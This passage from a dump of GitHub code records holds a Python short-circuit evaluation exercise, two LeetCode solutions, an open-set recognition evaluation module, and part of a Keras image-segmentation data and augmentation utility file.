>=2 and (x/y)>2 #throw a runtime error because first condition is true thus evaluate 2nd which cuase runtime\r\n\r\n#solution to part3 and part2 called guardian evaluation\r\nx=6\r\ny=0 \r\nx>2 and y!=0 and (x/y)>2 #the 3rd condition is guardian evaluation placed before the term that can cause runtime\r\n\r\nx=1\r\ny=0\r\nx>=2 and y!=0 and(x/y)>2\r\n","repo_name":"qamarabbas408/Python-4-Everybody","sub_path":"1Start/short_circuit.py","file_name":"short_circuit.py","file_ext":"py","file_size_in_byte":563,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"5098245933","text":"class Solution(object):\n def minWindow(self, s, t):\n \"\"\"\n :type s: str\n :type t: str\n :rtype: str\n 
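Sliding window: advance 'right' until the window covers every character of t (tracked with a Counter), then advance 'left' to shrink it, recording the smallest covering window seen so far.\n        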
\"\"\"\n import collections\n need, sLen, tLen = collections.Counter(t), len(s), len(t)\n left, right = 0, 0\n begin, end = None, 0\n while right < sLen:\n tLen -= need[s[right]] > 0\n need[s[right]] -= 1\n while tLen == 0:\n if begin is None or right - left < end - begin: begin, end = left, right\n need[s[left]] += 1\n if need[s[left]] > 0: tLen += 1\n left += 1\n right += 1\n return begin is not None and s[begin: end + 1] or \"\"\n\nt = Solution()\nprint(t.minWindow(\"a\", \"aa\"))","repo_name":"orangeljd/leetcode","sub_path":"MinimumWindowSubstring.py","file_name":"MinimumWindowSubstring.py","file_ext":"py","file_size_in_byte":745,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"11561264141","text":"#https://leetcode.com/problems/search-suggestions-system\n#def suggestedProducts(self, products: List[str], searchWord: str) -> List[List[str]]:\n\n\ndef suggestedProducts(products,search):\n products.sort()\n res=[]\n\n for i in range(len(search)):\n d=[]\n\n for product in products:\n if product[:i+1]==search[:i+1]:\n if len(d)>=3:\n break\n else:\n d.append(product)\n\n res.append(d)\n\n return res\n","repo_name":"Jerrrrry/leetcode-python-solution","sub_path":"amz/search-suggestion-system.py","file_name":"search-suggestion-system.py","file_ext":"py","file_size_in_byte":621,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"3302991034","text":"import os\nimport os.path\nimport pickle\n\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport sklearn\nfrom sklearn.metrics import roc_auc_score\nimport torch\n\nfrom penalties import compute_rpl_loss\n\n\n\ndef abridged_auc_softmax(min_hbr, hbr, f1):\n abridged_hbr_beg = 0\n for i in range(0, len(hbr)):\n if hbr[i] >= min_hbr:\n abridged_hbr_beg = i\n break\n \n abridged_hbr_f1_auc = sklearn.metrics.auc(hbr[abridged_hbr_beg:], f1[abridged_hbr_beg:])\n print(\"Abridged w/uncert AUC with min_hbr=\" + str(min_hbr) + \": \" + str(abridged_hbr_f1_auc/(1-min_hbr)))\n \n axes = plt.gca()\n axes.set_xlim([min_hbr,1.0])\n axes.set_ylim([0.0,0.8])\n plt.plot(hbr, f1)\n plt.show()\n \n return hbr[abridged_hbr_beg:], f1[abridged_hbr_beg:]\n\n\ndef calc_auroc(seen_conf_dict, unseen_conf_dict, key):\n \"\"\" Computes standard AUROC given predictions. 
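Scores are negated so that higher values mean \"more novel\"; with unseen inputs labelled 1, a high AUROC means novel inputs receive systematically lower max-class confidence than seen ones.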
\n    \n    Args:\n        seen_conf_dict: [dict] the max probability assigned to any class for each datapoint, across seen inputs\n        unseen_conf_dict: [dict] the max probability assigned to any class for each datapoint, across novel inputs\n        key: [str] whether to retrieve the unnormalized 'dist' value or the normalized 'prob' value\n    \"\"\"\n    # Interpret scores as probability for open cls\n    raw_seenset_openscores = []\n    for leaf_name in seen_conf_dict.keys():\n        raw_seenset_openscores = raw_seenset_openscores + [record[key] for record in seen_conf_dict[leaf_name]]\n    raw_seenset_openscores = np.array(raw_seenset_openscores)\n    seenset_openscores = -raw_seenset_openscores\n    seenset_true = np.zeros((len(seenset_openscores),))\n    raw_unseenset_openscores = []\n    for leaf_name in unseen_conf_dict.keys():\n        raw_unseenset_openscores = raw_unseenset_openscores + [record[key] for record in unseen_conf_dict[leaf_name]]\n    raw_unseenset_openscores = np.array(raw_unseenset_openscores)\n    unseenset_openscores = -raw_unseenset_openscores\n    unseenset_true = np.ones((len(unseenset_openscores),))\n    all_openscores = np.concatenate((seenset_openscores, unseenset_openscores), axis=None)\n    all_true = np.concatenate((seenset_true, unseenset_true), axis=None)\n    auc_score = roc_auc_score(all_true, all_openscores)\n    return auc_score\n\n\ndef collect_rpl_max(model, dataset_type, loader, folder_to_name, gamma, cifar=False, idx_to_label=None):\n    \"\"\" Care about 1) identity of max known class 2) distance to reciprocal points of this class. \"\"\"\n    # local imports: neither name is imported at the top of this module;\n    # compute_rpl_logits is assumed to live in the same 'penalties' module\n    # as compute_rpl_loss\n    from collections import defaultdict\n    from penalties import compute_rpl_logits\n    with torch.no_grad():\n        confidence_dict = defaultdict(list)\n        for i, data in enumerate(loader, 0):\n            # get the inputs & combine positive and negatives together\n            img = data['image']\n            img = img.cuda()\n            if cifar:\n                label_idx = data['label']\n            else:\n                folder_names = data['folder_name']\n\n            outputs = model.forward(img)\n\n            logits, dist_to_rp = compute_rpl_logits(model, outputs, gamma)\n            max_distances, max_indices = torch.max(logits, 1)\n            probs = torch.softmax(logits, dim=1)\n            max_probs, max_indices = torch.max(probs, 1)\n\n            for j in range(0, img.shape[0]):\n                if cifar:\n                    correct_leaf = idx_to_label[label_idx[j].item()]\n                else:\n                    correct_leaf = folder_to_name['n' + folder_names[j]]\n                predicted_leaf_idx = max_indices[j].item()\n                dist = max_distances[j].item()\n                prob = max_probs[j].item()\n                confidence_dict[correct_leaf].append({'idx': predicted_leaf_idx, 'dist': dist, 'prob': prob})\n\n    return confidence_dict\n\n\ndef evaluate_val(model, criterion, val_loader, gamma, lamb, divide, logger):\n    with torch.no_grad():\n        running_loss = 0.0\n        normal_correct = 0.\n        used_correct = 0.\n        normal_total = 0.0\n        used_total = 0.0\n        normal_running_loss = 0.\n        used_running_loss = 0.\n        val_rpl_loss = 0.\n\n        logger.info(\"beginning validation\")\n\n        for i, data in enumerate(val_loader, 0):\n\n            # get the inputs & combine positive and negatives together\n            img = data['image']\n            img = img.cuda()\n\n            labels = data['label']\n            labels = labels.cuda()\n\n            outputs = model.forward(img)\n\n            # Compute RPL loss\n            loss, open_loss, closed_loss, logits = compute_rpl_loss(model, outputs, labels, criterion, lamb, gamma, divide == 'TRUE')\n            val_rpl_loss += loss.item()\n\n            probs = torch.softmax(logits, dim=1)\n            max_probs, max_indices = torch.max(probs, 1)\n\n            used_correct += torch.sum(max_indices == labels).item()\n            used_total += probs.shape[0]\n            used_running_loss += loss.item()\n\n        used_val_acc = used_correct/(used_total)\n        logger.info(\"Used Validation Accuracy is : \" + str(used_val_acc))\n        logger.info(\"Used Average 
validation loss is: \" + str(used_running_loss/used_total))\n logger.info(\"finished validation\")\n \n return used_running_loss, used_val_acc\n \n \ndef seenval_baseline_thresh(confidence_dict, thresh, cifar=False, label_to_idx=None, folder_to_idx=None, name_to_folder=None, save_path=None, value_key='prob'):\n \"\"\" Given a softmax classifier, evaluate performance on seen validation set using thresholds on softmax probabilities. \"\"\"\n softmax_correct = [0.0 for i in range(0, len(thresh))]\n per_cls_softmax_correct = [{leaf_name: 0.0 for leaf_name in confidence_dict.keys()} for i in range(0, len(thresh))]\n mistake_log = [{leaf_name: {} for leaf_name in confidence_dict.keys()} for i in range(0, len(thresh))]\n semantic_precision = np.zeros((len(thresh), ))\n semantic_tot = np.zeros((len(thresh), ))\n num_correctly_predict_seen = np.zeros((len(thresh), ))\n num_predict_seen = np.zeros((len(thresh), ))\n total = 0.0\n # fix class\n for leaf_name in confidence_dict.keys():\n \n max_indices = torch.tensor([record['idx'] for record in confidence_dict[leaf_name]]).long()\n max_probs = torch.tensor([record[value_key] for record in confidence_dict[leaf_name]])\n \n if cifar:\n labels = torch.full(max_indices.size(), label_to_idx[leaf_name], dtype=torch.long)\n else:\n labels = torch.full(max_indices.size(), folder_to_idx[name_to_folder[leaf_name]], dtype=torch.long)\n \n total += max_indices.shape[0]\n \n for i in range(0, len(thresh)):\n proceed = max_probs.cpu() > torch.full(max_probs.size(), thresh[i])\n num_predict_seen[i] += torch.sum(proceed).item()\n correct_cls = max_indices.cpu() == labels\n correct_vec = correct_cls & proceed\n num_corr = torch.sum(correct_vec).item()\n softmax_correct[i] += num_corr\n per_cls_softmax_correct[i][leaf_name] = num_corr/len(confidence_dict[leaf_name])\n \n total = float(sum([len(confidence_dict[leaf_name]) for leaf_name in confidence_dict.keys()]))\n success_rate = [softmax_correct[i]/total for i in range(0, len(softmax_correct))]\n \n info = {'success_rate': success_rate, 'per_cls_softmax_correct': per_cls_softmax_correct, 'mistake_log': mistake_log, \n 'semantic_precision': semantic_precision, 'num_correctly_predict_seen': softmax_correct, 'num_predict_seen': num_predict_seen, 'total': total}\n \n if save_path is not None:\n \n if os.path.exists(save_path):\n raise ValueError(save_path + ' already exists.')\n \n with open(save_path, 'wb') as f:\n pickle.dump(info, f)\n \n return info\n\n\ndef summarize(seenval_report, unseenval_report, thresh, verbose=True):\n \"\"\" Produce miscellaneous metrics based on predictions. 
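Here 'hbr' is the fraction of unseen inputs correctly rejected (open-set recall), 'f1' combines precision and recall on the seen classes, and the AUCs are computed over deduplicated (hbr, recall) and (fpr, hbr) pairs.\n    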
\"\"\"\n seen_precision = []\n hbr = []\n whole_prec = []\n recall = []\n f1 = []\n f1_hbr_avg = []\n mod_f1 = []\n harm_mod_f1 = []\n unique_hbr = []\n unique_f1 = []\n unique_seen_recall = []\n prev_hbr = -100.0\n best_f1 = -10.0\n best_seen_recall = -10.0\n fpr = []\n unique_fpr = []\n fpr_assoc_hbr = []\n prev_fpr = -100.0\n best_fpr_assoc_hbr = -10.0\n for i in range(0, len(thresh)):\n\n curr_seen_prec = seenval_report['num_correctly_predict_seen'][i]/seenval_report['num_predict_seen'][i]\n seen_precision.append(curr_seen_prec)\n \n curr_hbr = (unseenval_report['total'] - unseenval_report['num_predict_seen'][i])/unseenval_report['total']\n hbr.append(curr_hbr)\n \n curr_whole_prec = (curr_seen_prec + curr_hbr)/2.0\n curr_harm_whole_prec = (2.0 * ((curr_seen_prec * curr_hbr)/(curr_seen_prec + curr_hbr)))\n whole_prec.append(curr_whole_prec)\n\n curr_recall = seenval_report['num_correctly_predict_seen'][i]/seenval_report['total']\n recall.append(curr_recall)\n curr_f1 = 2.0 * ((curr_seen_prec * curr_recall)/(curr_seen_prec + curr_recall))\n f1.append(curr_f1)\n \n # if we are on a streak of > 1 of the same value, then update best associated f1 and maintain streak to next hbr\n if curr_hbr == prev_hbr:\n if curr_f1 > best_f1:\n best_f1 = curr_f1\n if curr_recall > best_seen_recall:\n best_seen_recall = curr_recall\n # otherwise streak is broken with prev_hbr, then record prev_hbr/best_associated_f1 and reset trackers for new hbr\n else:\n # edge case where covering first possible hbr, then don't add anything\n if prev_hbr >= 0:\n unique_hbr.append(prev_hbr)\n unique_f1.append(best_f1)\n unique_seen_recall.append(best_seen_recall)\n prev_hbr = curr_hbr\n best_f1 = curr_f1\n best_seen_recall = curr_recall\n \n # edge case: last threshold, must close down. if streak, end with best value. else no streak, put in current value.\n if i == len(thresh) - 1:\n unique_hbr.append(prev_hbr)\n unique_f1.append(best_f1)\n unique_seen_recall.append(best_seen_recall)\n \n f1_hbr_avg.append((curr_f1 + curr_hbr)/2.0)\n mod_f1.append(2.0 * ((curr_whole_prec * curr_recall)/(curr_whole_prec + curr_recall)))\n harm_mod_f1.append(2.0 * ((curr_harm_whole_prec * curr_recall)/(curr_harm_whole_prec + curr_recall)))\n \n # calculate fpr\n curr_fpr = (seenval_report['total'] - seenval_report['num_predict_seen'][i])/seenval_report['total']\n fpr.append(curr_fpr)\n \n if curr_fpr == prev_fpr:\n if curr_hbr > best_fpr_assoc_hbr:\n best_fpr_assoc_hbr = curr_hbr\n else:\n if prev_fpr >= 0:\n unique_fpr.append(prev_fpr)\n fpr_assoc_hbr.append(best_fpr_assoc_hbr)\n prev_fpr = curr_fpr\n best_fpr_assoc_hbr = curr_hbr\n \n if i == len(thresh) - 1:\n unique_fpr.append(prev_fpr)\n fpr_assoc_hbr.append(best_fpr_assoc_hbr)\n \n \n # clean nan values so auc calc works\n clean_unique_hbr = []\n clean_unique_f1 = []\n for i in range(0, len(unique_hbr)):\n if not np.isnan(unique_f1[i]):\n clean_unique_hbr.append(unique_hbr[i])\n clean_unique_f1.append(unique_f1[i])\n \n hbr_recall_auc = sklearn.metrics.auc(unique_hbr, unique_seen_recall)\n \n lit_auc = sklearn.metrics.auc(unique_fpr, fpr_assoc_hbr)\n \n if verbose:\n print(\"AUC of Open-Recall vs. 
Closed-Recall curve: \" + str(hbr_recall_auc))\n print(\"AUROC from literature: \" + str(lit_auc))\n print(\"U-OSR/U-CSR: \")\n for i in range(0, len(unique_hbr)):\n print(str(unique_hbr[i]) + '/' + str(unique_seen_recall[i]))\n \n# print(\"\\nFull Details --- SeenP/R/ModF1/ModHarmF1/FPR/HBR/F1/F1_HBR_AVG: \")\n# for i in range(0, len(thresh)):\n# print(\"At thresh \" + str(thresh[i]) + ': ' + str(round(seen_precision[i], 3)) + '/' + str(round(recall[i], 3)) + '/' + str(round(mod_f1[i], 3)) + '/' + str(round(harm_mod_f1[i], 3)) + '/' + str(round(fpr[i], 3)) + '/' + str(round(hbr[i], 3)) + '/' + str(round(f1[i], 3)) + '/' + str(round(f1_hbr_avg[i], 3)))\n\n return {'lit_AUROC': lit_auc, 'OSR_CSR_AUC': hbr_recall_auc, 'cleaned_open_recall': clean_unique_hbr, 'cleaned_f1': clean_unique_f1, 'unique_open_recall': unique_hbr, 'unique_closed_recall': unique_seen_recall, 'unique_fpr': unique_fpr, 'fpr_assoc_hbr': fpr_assoc_hbr}\n\n\ndef unseenval_baseline_thresh(confidence_dict, thresh, save_path=None, value_key='prob'):\n \"\"\" Given a softmax classifier, evaluate performance on unseen validation set using thresholds on softmax probabilities. \"\"\"\n softmax_correct = [0.0 for i in range(0, len(thresh))]\n per_cls_softmax_correct = [{leaf_name: 0.0 for leaf_name in confidence_dict.keys()} for i in range(0, len(thresh))]\n mistake_log = [{leaf_name: {} for leaf_name in confidence_dict.keys()} for i in range(0, len(thresh))]\n semantic_precision = np.zeros((len(thresh), ))\n num_predict_seen = np.zeros((len(thresh), ))\n # fix class\n for leaf_name in confidence_dict.keys():\n \n max_indices = torch.tensor([record['idx'] for record in confidence_dict[leaf_name]]).long()\n max_probs = torch.tensor([record[value_key] for record in confidence_dict[leaf_name]])\n \n for i in range(0, len(thresh)):\n proceed = max_probs.cpu() > torch.full(max_probs.size(), thresh[i])\n num_predict_seen[i] += torch.sum(proceed).item()\n correct_vec = ~proceed\n num_corr = torch.sum(correct_vec).item()\n softmax_correct[i] += num_corr\n per_cls_softmax_correct[i][leaf_name] = num_corr/len(confidence_dict[leaf_name])\n \n total = float(sum([len(confidence_dict[leaf_name]) for leaf_name in confidence_dict.keys()]))\n success_rate = [softmax_correct[i]/total for i in range(0, len(softmax_correct))]\n \n info = {'success_rate': success_rate, 'per_cls_softmax_correct': per_cls_softmax_correct, 'mistake_log': mistake_log, \n 'semantic_precision': semantic_precision, 'num_predict_seen': num_predict_seen, 'total': total}\n \n if save_path is not None:\n \n if os.path.exists(save_path):\n raise ValueError(save_path + ' already exists.')\n \n with open(save_path, 'wb') as f:\n pickle.dump(info, f)\n \n return info\n","repo_name":"KevLuo/OpenSet_ReciprocalPoints","sub_path":"rpl/evaluate.py","file_name":"evaluate.py","file_ext":"py","file_size_in_byte":14543,"program_lang":"python","lang":"en","doc_type":"code","stars":20,"dataset":"github-code","pt":"72"} +{"seq_id":"30762284989","text":"import numpy as np\r\nimport os, sys, fnmatch\r\nfrom skimage import io\r\nfrom skimage.transform import rotate\r\nfrom skimage.util.shape import view_as_windows\r\nfrom keras.models import Model\r\nfrom keras.losses import binary_crossentropy, categorical_crossentropy\r\nfrom keras.layers import Convolution2D, MaxPooling2D, Lambda, Reshape, Flatten, merge\r\nfrom keras.layers import Input, Concatenate, UpSampling2D, Dropout, BatchNormalization\r\nfrom keras.callbacks import ModelCheckpoint\r\nfrom keras import backend as K\r\nfrom 
keras.optimizers import Adam\r\nfrom keras.utils import to_categorical, Sequence\r\n\r\n##################\r\n# Path functions #\r\n##################\r\n\r\n# Collect paths of images recursively\r\ndef get_paths(path, img_extension, subfolder=None):\r\n    if subfolder:\r\n        path = os.path.join(path, subfolder)\r\n    \r\n    img_paths = []\r\n    for root, directories, filenames in os.walk(path):\r\n        for filename in fnmatch.filter(filenames, \"*\" + img_extension):\r\n            img_paths.append(os.path.join(root, filename))\r\n    \r\n    return img_paths\r\n\r\n# Collects image and mask paths for training\r\ndef training_paths(path, img_extension, mask_extension):\r\n    img_paths = get_paths(path, img_extension, subfolder='images')\r\n    mask_paths = get_paths(path, mask_extension, subfolder='masks')\r\n    img_paths.sort()\r\n    mask_paths.sort()\r\n    return img_paths, mask_paths\r\n\r\n# Loads images and makes training patches\r\ndef get_patches(train_data_path, segmentation_channels, patch_shape, img_extension, mask_extension, workflow_type, patch_thresh=0.05):\r\n    # Gather paths\r\n    img_paths, mask_paths = training_paths(train_data_path, img_extension, mask_extension)\r\n    if len(img_paths) != len(mask_paths):\r\n        sys.exit(\"Number of images and masks is inconsistent. Maybe your directories are not named 'images' and 'masks'? Exiting... (# images: {} | # masks: {})\".format(len(img_paths), len(mask_paths)))\r\n    \r\n    train_images = []\r\n    train_masks = []\r\n    n_images = len(img_paths)\r\n    for ind in range(n_images):\r\n        #if (ind+1) % 2 == 0 or ind == 0:\r\n        print (\" >> Generating patches for image\", ind+1, \"of\", str(n_images) + \"...\")\r\n        print (\" >> Currently at\", len(train_images), \"total image pairs\")\r\n        # NOTE: the patch extraction/append step is elided in the source,\r\n        # so as written this function returns empty arrays\r\n    \r\n    return np.array(train_images, dtype=np.float32), np.array(train_masks, dtype=np.float32)\r\n    \r\n###################\r\n# Image Functions #\r\n###################\r\n\r\ndef change_dim_order(image, dim_order, dim_default):\r\n    print (\" >> Converting dimension order from \" + dim_order + '->' + dim_default)\r\n    if len(image.shape) < len(dim_order):\r\n        print (\" >> The script requires a C dimension of 1... adding C @ dimension \" + str(dim_order.index('C')))\r\n        image = np.expand_dims(image, dim_order.index('C'))\r\n    image = np.einsum(dim_order + '->' + dim_default, image)\r\n    return image\r\n\r\ndef open_image(image_path, dtype=np.float32, channel_dim=True):\r\n    img = io.imread(image_path).astype(dtype)\r\n    if channel_dim and len(img.shape) < 3:\r\n        img = np.expand_dims(img, axis=-1)\r\n    return img\r\n\r\ndef channel_selector(img, selected_channels):\r\n    n_ch = len(selected_channels)\r\n    new_img = np.zeros((img.shape[:-1] + (n_ch,)), dtype=np.float32)\r\n    try:\r\n        for ch_i in range(n_ch):\r\n            new_img[...,ch_i] = img[...,selected_channels[ch_i]]\r\n    except IndexError:\r\n        sys.exit(\"Error: Too many channels ({}) selected for an image with {} channels! Exiting...\".format(str(selected_channels), img.shape[-1]))\r\n    return new_img\r\n    \r\ndef max_norm(img):\r\n    return img / np.max(img)\r\n    \r\n# def convert_if_categorical(label, workflow_type):\r\n    # if (len(label.shape) == 2 or (label.shape[-1] == 1 and np.max(label) > 1)) and workflow_type=='segmentation':\r\n        # print (\" >> Label looks like grayscale values... 
converting to categorical representation.\")\r\n        # label = to_categorical(label)\r\n        # print (\" >> Number of classes in this label: {}\".format(label.shape[-1]))\r\n    # else:\r\n        # label = max_norm(label)\r\n        # if len(label.shape) < 3:\r\n            # label = np.expand_dims(label, axis=-1)\r\n    \r\n    # return label\r\n    \r\ndef is_above_thresh(img, threshold):\r\n    # Check if this image has enough positive pixels\r\n    return (img > 0).sum() > (threshold * np.array(img.shape).prod())\r\n    \r\n# Individual augmentations\r\n    \r\ndef rotate(img, deg=None):\r\n    # NOTE: this local rotate shadows skimage.transform.rotate imported above\r\n    if deg and deg % 90 == 0:\r\n        its = int(deg/90)\r\n        for i in range(its):\r\n            img = np.rot90(img)\r\n        return img\r\n    else:\r\n        return img\r\n\r\ndef mirror(img, order=None):\r\n    if order == 'lr':\r\n        return np.fliplr(img)\r\n    elif order == 'ud':\r\n        return np.flipud(img)\r\n    else:\r\n        return img\r\n\r\n# Pairwise Augmentations\r\n    \r\ndef rotate_pair(img, label, deg=None):\r\n    return rotate(img, deg), rotate(label, deg)\r\n\r\ndef mirror_pair(img, label, order=None):\r\n    return mirror(img, order), mirror(label, order)\r\nflip_pair = mirror_pair\r\n\r\ndef random_crop(img, label, random_crop_size, threshold=None):\r\n    height, width = img.shape[0], img.shape[1]\r\n    dy, dx = random_crop_size\r\n    x = np.random.randint(0, width - dx + 1)\r\n    y = np.random.randint(0, height - dy + 1)\r\n    if threshold:\r\n        for _ in range(10):\r\n            if is_above_thresh(label[y:(y+dy), x:(x+dx)], threshold):\r\n                return img[y:(y+dy), x:(x+dx)], label[y:(y+dy), x:(x+dx)]\r\n            else:\r\n                x = np.random.randint(0, width - dx + 1)\r\n                y = np.random.randint(0, height - dy + 1)\r\n    return img[y:(y+dy), x:(x+dx)], label[y:(y+dy), x:(x+dx)]\r\n\r\n# Apply random augmentations to image pair\r\n\r\ndef augment_image_pair(img, label, augmentations=None):\r\n    if not augmentations:\r\n        return img, label\r\n    else:\r\n        aug_fn = np.random.choice(augmentations, 1)[0]\r\n        # apply the chosen pairwise augmentation (e.g. rotate_pair / mirror_pair)\r\n        # to the image and its label together, so both receive the same transform\r\n        return aug_fn(img, label)\r\n\r\n# Noise Functions\r\n\r\ndef guassian_noise(image, mean=0, var=0.1):\r\n    row, col, ch = image.shape\r\n    sigma = var**0.5\r\n    gauss = np.random.normal(mean, sigma, (row, col, ch))\r\n    gauss = gauss.reshape(row, col, ch)\r\n    noisy = image + gauss\r\n    return noisy\r\n\r\ndef saltpepper_noise(image, svp=0.5, amount=0.004):\r\n    row, col, ch = image.shape\r\n    out = np.copy(image)\r\n    # Salt mode\r\n    try:\r\n        num_salt = np.ceil(amount * image.size * svp)\r\n        coords = [np.random.randint(0, i, int(num_salt)) for i in image.shape]\r\n        out[coords] = 1\r\n\r\n        # Pepper mode\r\n        num_pepper = np.ceil(amount * image.size * (1. 
- svp))\r\n coords = [np.random.randint(0, i, int(num_pepper)) for i in image.shape]\r\n out[coords] = 0\r\n except:\r\n pass\r\n \r\n return out\r\n\r\ndef poisson_noise(image):\r\n vals = len(np.unique(image))\r\n vals = 2 ** np.ceil(np.log2(vals))\r\n noisy = np.random.poisson(image * vals) / float(vals)\r\n return noisy\r\n \r\ndef speckle_noise(image):\r\n row,col,ch = image.shape\r\n gauss = np.random.randn(row,col,ch)\r\n gauss = gauss.reshape(row,col,ch) \r\n noisy = image + image * gauss\r\n return noisy\r\n\r\n##################\r\n# Data Generator #\r\n##################\r\n\r\nclass PatchDataGen(Sequence):\r\n 'Generates data for Keras'\r\n def __init__(self, data_list, label_list, patch_shape, batch_size, \r\n segmentation_channels, workflow_type, shuffle=True, preloaded_imgs=None, preloaded_labels=None):\r\n self.data_list = data_list\r\n self.label_list = label_list\r\n self.batch_size = batch_size\r\n self.shuffle = shuffle\r\n \r\n # If Preloaded Data exists...\r\n self.preloaded_imgs = preloaded_imgs\r\n self.preloaded_labels = preloaded_labels\r\n \r\n self.patch_shape = patch_shape\r\n self.segmentation_channels = segmentation_channels\r\n self.workflow_type = workflow_type\r\n \r\n self.on_epoch_end()\r\n \r\n def __len__(self):\r\n return int(np.floor(len(self.data_list) / self.batch_size) )\r\n\r\n def __getitem__(self, index):\r\n 'Generate one batch of data'\r\n # Generate indexes of the batch\r\n indexes = self.indexes[index*self.batch_size:(index+1)*self.batch_size]\r\n\r\n # Generate data\r\n return self._data_generation(indexes)\r\n\r\n def on_epoch_end(self):\r\n 'Updates indexes after each epoch'\r\n self.indexes = np.arange(len(self.data_list))\r\n if self.shuffle == True:\r\n np.random.shuffle(self.indexes)\r\n\r\n def _data_generation(self, temp_ids):\r\n 'Generates data containing batch_size samples' # X : (n_samples, *dim, n_channels)\r\n patch_shape = self.patch_shape\r\n segmentation_channels = self.segmentation_channels\r\n \r\n imgs = []\r\n labels = []\r\n # Generate data\r\n for i, id in enumerate(temp_ids):\r\n # Get sample\r\n tmp_img_data = self.data_list[id]\r\n tmp_label_data = self.label_list[id]\r\n \r\n # Ex: [img_paths[ind], patch_ind_0, patch_ind_1, 'fliplr']\r\n tmp_img_path, tmp_patch_ind_0, tmp_patch_ind_1, tmp_augmentation = tmp_img_data\r\n \r\n tmp_mask_path = tmp_label_data[0]\r\n \r\n # Read image, split only the segmentation_channels, and normalize\r\n if self.preloaded_imgs is not None:\r\n img = self.preloaded_imgs[tmp_img_path]\r\n else:\r\n img = io.imread(tmp_img_path).astype(np.float32)\r\n if len(img.shape) < 3:\r\n img = np.expand_dims(img, axis=-1)\r\n n_ch = len(segmentation_channels)\r\n new_img = np.zeros((img.shape[:-1] + (n_ch,))) #, dtype=np.float32)\r\n for ch_i in range(n_ch):\r\n new_img[...,ch_i] = img[...,segmentation_channels[ch_i]]\r\n img = new_img\r\n img = img / np.max(img)\r\n \r\n img_patch_shape = patch_shape + (img.shape[-1],)\r\n \r\n # Load masks and normalize\r\n if self.preloaded_labels is not None:\r\n mask = self.preloaded_labels[tmp_mask_path]\r\n else:\r\n mask = io.imread(tmp_mask_path).astype(np.float32)\r\n if (len(mask.shape) == 3) and (mask.shape[0] < mask.shape[-1]):\r\n mask = np.moveaxis(mask, 0, -1)\r\n \r\n # If mask is a single channel with grayscale values as labels, convert to channel format\r\n if (len(mask.shape) == 2 or (mask.shape[-1] == 1 and np.max(mask) > 1)) and self.workflow_type=='segmentation':\r\n mask = to_categorical(mask)\r\n else:\r\n mask = mask / np.max(mask)\r\n 
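# at this point 'mask' is either a one-hot categorical array or a max-normalised\r\n                # float mask; either way it gets an explicit channel dimension below\r\n                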
if len(mask.shape) < 3:\r\n mask = np.expand_dims(mask, axis=-1)\r\n mask_patch_shape = patch_shape + (mask.shape[-1],)\r\n \r\n # Create windows from both the training images and the masks\r\n img_patches = view_as_windows(img, img_patch_shape, step=patch_shape[0]//4)\r\n mask_patches = view_as_windows(mask, mask_patch_shape, step=patch_shape[0]//4)\r\n img_patches = np.squeeze(img_patches)\r\n mask_patches = np.squeeze(mask_patches)\r\n \r\n # Select the correct patch\r\n img_patch = np.array(img_patches[tmp_patch_ind_0,tmp_patch_ind_1])\r\n mask_patch = np.array(mask_patches[tmp_patch_ind_0,tmp_patch_ind_1])\r\n\r\n # Add Channel dim if not included\r\n if len(img_patch.shape) < 3:\r\n img_patch = np.expand_dims(img_patch, axis=-1)\r\n if len(mask_patch.shape) < 3:\r\n mask_patch = np.expand_dims(mask_patch, axis=-1)\r\n\r\n # Do augmentation if needed\r\n if tmp_augmentation != '':\r\n \r\n # Geometric Augmentations\r\n if tmp_augmentation[:3] == 'rot':\r\n img_patch, mask_patch = rotate_pair(img_patch, mask_patch, deg=int(tmp_augmentation[3:]))\r\n elif tmp_augmentation[:4] == 'flip':\r\n img_patch, mask_patch = flip_pair(img_patch, mask_patch, order=tmp_augmentation[4:])\r\n \r\n # Noise Augmentations\r\n elif 'noise' in tmp_augmentation:\r\n if 'gaussian' in tmp_augmentation:\r\n img_patch = guassian_noise(img_patch)\r\n elif 'speckle' in tmp_augmentation:\r\n img_patch = speckle_noise(img_patch)\r\n elif 'poisson' in tmp_augmentation:\r\n img_patch = poisson_noise(img_patch)\r\n elif 'saltpepper' in tmp_augmentation:\r\n img_patch = saltpepper_noise(img_patch)\r\n \r\n # TODO: Add Color Augmentations\r\n\r\n imgs.append(img_patch)\r\n labels.append(mask_patch)\r\n \r\n return np.array(imgs), np.array(labels)\r\n \r\n#################################\r\n# Calculate Valid Image Patches #\r\n#################################\r\n\r\n# Loads images and makes training patches\r\ndef calculate_valid_patches_and_stats(train_data_path, segmentation_channels, patch_shape, img_extension, mask_extension, workflow_type, validation_split=0.2, patch_thresh=0.05, augmentations=[]):\r\n # Gather paths\r\n img_paths, mask_paths = training_paths(train_data_path, img_extension, mask_extension)\r\n if len(img_paths) != len(mask_paths):\r\n sys.exit(\"Number of images and masks is inconsistent. Exiting... 
(# images: {} | # masks: {})\".format(len(img_paths), len(mask_paths)))\r\n    \r\n    print (\" >> Training augmentations to perform: \", augmentations)\r\n    categorical_notice = True\r\n    input_channels = None\r\n    output_channels = None\r\n    train_images = []\r\n    train_masks = []\r\n    val_images = []\r\n    val_masks = []\r\n    n_images = len(img_paths)\r\n    \r\n    # Image Data Dictionaries\r\n    loaded_imgs = {}\r\n    loaded_masks = {}\r\n    \r\n    # Calculate Validation Images\r\n    n_val_images = int(np.ceil(n_images * validation_split))\r\n    val_inds = list(np.random.choice(n_images, n_val_images, replace=False))\r\n    \r\n    for ind in range(n_images):\r\n        if ind not in val_inds:\r\n            training_flag = True\r\n        else:\r\n            training_flag = False\r\n        \r\n        if (ind+1) % 10 == 0 or ind == 0 or not training_flag:\r\n            print (\" >> Calculating valid **\", \"TRAINING\" if training_flag else \"VALIDATION\", \"** patches for image\", ind+1, \"of\", str(n_images) + \"...\")\r\n            print (\" >> Currently at\", len(train_images) if training_flag else len(val_images), \"image pairs\")\r\n        \r\n        # Read image, split only the segmentation_channels, and normalize\r\n        img = io.imread(img_paths[ind]).astype(np.float32)\r\n        if len(img.shape) < 3:\r\n            img = np.expand_dims(img, axis=-1)\r\n        n_ch = len(segmentation_channels)\r\n        new_img = np.zeros((img.shape[:-1] + (n_ch,)), dtype=np.float32)\r\n        for ch_i in range(n_ch):\r\n            new_img[...,ch_i] = 